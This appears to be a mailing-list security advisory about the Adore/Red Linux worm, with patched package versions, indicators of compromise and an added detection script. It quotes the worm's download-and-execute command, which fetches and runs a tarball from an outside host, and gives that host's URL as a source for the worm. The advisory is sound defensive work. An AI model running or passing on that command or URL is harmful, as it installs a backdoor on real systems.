
[linux-security] RedWorm warning



Topic
=====
Warning about RedWorm.

Problem Description
===================
This is not an advisory about a new vulnerability: it concerns systems that
are not patched against the most common remote root exploits on Linux,
particularly rpc.statd, bind, LPRng, and wu-ftpd. Your system should have the
following versions installed (this is for RedHat; please check your own
distribution for the newest version):

# rpm -q nfs-utils
nfs-utils-0.1.9.1-x     (x can be 1 or 7)
# rpm -q bind
bind-8.2.2_P7-x         (x can be 0.6.2 or 1)
# rpm -q LPRng
LPRng-x                 with x at least 3.6.24
# rpm -q wu-ftpd
wu-ftpd-2.6.x           with x either 0-14.6x or 1-6

(if you get the response "package not installed", that's fine too)

Note that advisories about each of these have appeared on this list, hence
you should not (must not!) be vulnerable to any of these bugs. If you
are vulnerable, you just earned the right to have your internet connection
terminated. Please email me your IP address so that we can do so.

Note that we are currently receiving several portscans every week across
the whole 142.58.0.0 network looking for these kinds of vulnerabilities.

Information on the RedWorm
==========================
Adore/Red attacks vulnerabilities in rpc.statd, bind, LPRng, and
wuftpd26.  All compromised systems we've seen so far have been RedHat 7.
A successful attack downloads and executes a copy of itself via the
following command sequence.

  TERM="linux"
  export PATH="/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin"
  lynx -dump http://go.163.com/~hotcn/red.tar >/usr/lib/red.tar
  [ -f /usr/lib/red.tar ] || exit 0
  cd /usr/lib;tar -xvf red.tar;rm -rf red.tar;cd lib;./start.sh

Red Worm replaces klogd with its own backdoor.  It also puts the original
klogd in /usr/lib/klogd.o.  I would run strings on /sbin/klogd.  If it
includes the strings /bin/sh or icmp, then it is the backdoor.
The trojan'd klogd is compiled and set running on port 65535, waiting
for an incoming packet with a data size of 77 bytes.

The results of the scans are e-mailed to two addresses in the PRC.

  adore9000@21cn.com
  adore9000@sina.com

One of the new twists on this worm is that it installs its own
version of /etc/cron.daily/0anacron, the root cron process that
gets executed once a day.  The first time the daily cron
process runs after Adore is installed, it will replace all trojan'd
files with the originals and delete the worm's install directory,
/usr/lib/lib.
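The indicators above, gathered into one host-check script, as an added example that is not part of the original post: it looks for the /bin/sh and icmp strings in klogd, the /usr/lib/klogd.o backup and /usr/lib/lib directory, a replaced 0anacron, and a socket bound to port 65535. The environment overrides for the paths and the 0anacron content heuristic are assumptions of this example, not something the post states.

```shell
#!/bin/sh
# Added host check for the Adore/Red indicators named in this post (example
# code, not from the post or the worm). Paths and port are the post's; the
# environment overrides are an assumption so checks can run on file copies.
: "${KLOGD:=/sbin/klogd}"
: "${KLOGD_BACKUP:=/usr/lib/klogd.o}"
: "${WORM_DIR:=/usr/lib/lib}"
: "${ANACRON:=/etc/cron.daily/0anacron}"
: "${BACKDOOR_PORT:=65535}"

# 0 if the binary carries the "/bin/sh" or "icmp" strings the post ties to
# the trojaned klogd; grep -a on the raw file stands in for "strings | grep".
klogd_looks_trojaned() {
    f="${1:-$KLOGD}"
    [ -f "$f" ] && grep -aq -e '/bin/sh' -e 'icmp' "$f"
}

# 0 if the saved original klogd or the install directory exists.
worm_artifacts_present() {
    hit=1
    for p in "$KLOGD_BACKUP" "$WORM_DIR"; do
        [ -e "$p" ] && { echo "found: $p"; hit=0; }
    done
    return $hit
}

# 0anacron exists on a clean box, so only its contents tell. Heuristic
# (assumption): the worm's copy must name the directory it later deletes.
anacron_looks_replaced() {
    f="${1:-$ANACRON}"
    [ -f "$f" ] && grep -qF -- "$WORM_DIR" "$f"
}

# 0 if a tcp/udp socket is bound to the backdoor port (partial: raw sockets don't show).
backdoor_port_bound() {
    if command -v ss >/dev/null 2>&1; then l=$(ss -lntu 2>/dev/null || true)
    else l=$(netstat -lntu 2>/dev/null || true); fi
    printf '%s\n' "$l" | grep -q ":${BACKDOOR_PORT}[[:space:]]"
}

report() {
    rc=0
    klogd_looks_trojaned && { echo "WARNING: $KLOGD has backdoor strings"; rc=1; }
    worm_artifacts_present && rc=1
    anacron_looks_replaced && { echo "WARNING: $ANACRON names $WORM_DIR"; rc=1; }
    backdoor_port_bound && { echo "WARNING: port $BACKDOOR_PORT bound"; rc=1; }
    [ "$rc" -eq 0 ] && echo "no Adore/Red indicators found"
    return "$rc"
}
report
```

Run it as root on the suspect host; a non-zero exit status means at least one indicator was found and the named files should be examined by hand.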

Source for RedWorm can be found at:

        http://go.163.com/~hotcn/red.tar

This should help in tracking down other methods of identification.